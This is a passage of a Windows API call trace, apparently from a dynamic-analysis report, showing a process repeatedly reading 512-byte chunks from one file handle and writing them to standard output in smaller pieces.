lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] GetFileType (hFile=0x50) returned 0x1 [0223.269] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.269] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.269] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.269] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.270] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.270] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.271] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.271] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] GetFileType (hFile=0x50) returned 0x1 [0223.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.271] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] GetFileType (hFile=0x50) returned 0x1 [0223.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.272] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.273] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.273] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.273] GetFileType (hFile=0x50) returned 0x1 [0223.273] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] GetFileType (hFile=0x50) returned 0x1 [0223.274] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.274] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.274] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.274] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.275] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] GetFileType (hFile=0x50) returned 0x1 [0223.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.275] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.276] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.276] GetFileType (hFile=0x50) returned 0x1 [0223.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.277] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.420] GetFileType (hFile=0x50) returned 0x1 [0223.420] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.420] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.421] GetFileType (hFile=0x50) returned 0x1 [0223.421] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.422] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.422] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] GetFileType (hFile=0x50) returned 0x1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.422] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.422] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] WriteFile (in: hFile=0x50, lpBuffer=0x2aecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aecec*, lpNumberOfBytesWritten=0x2adcf0*=0x20, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.423] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2adcdc | out: lpNewFilePointer=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=4) returned 0x58 [0223.423] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.423] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aeb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aeb5c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebac*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aebfc*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] GetFileType (hFile=0x50) returned 0x1 [0223.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.424] WriteFile (in: hFile=0x50, lpBuffer=0x2aec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec4c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] WriteFile (in: hFile=0x50, lpBuffer=0x2aec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2adcf0, lpOverlapped=0x0 | out: lpBuffer=0x2aec9c*, lpNumberOfBytesWritten=0x2adcf0*=0x50, lpOverlapped=0x0) returned 1 [0223.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0223.425] GetFileType (hFile=0x50) returned 0x1 [0223.425] _get_osfhandle 